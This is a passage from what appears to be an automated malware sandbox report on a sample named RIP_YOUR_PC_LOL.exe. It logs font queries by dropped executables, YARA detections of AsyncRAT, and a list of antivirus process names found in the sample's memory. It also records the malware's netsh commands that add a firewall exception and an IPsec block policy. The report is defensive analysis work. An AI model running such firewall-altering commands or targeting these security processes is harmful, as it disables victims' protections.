                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeQueries volume information: C:\Users\user\AppData\Roaming\test.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeCode function: 7_2_0040AE40 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_0040AE40

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Yara detected AsyncRAT
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.59c8085.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3479694.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: test.exe PID: 6236, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\test.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Uses netsh to modify the Windows network and firewall settings
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add policy name=Block
                    Modifies the windows firewall
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: acs.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: avcenter.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: kxetray.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: avp.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: cfp.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 360tray.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
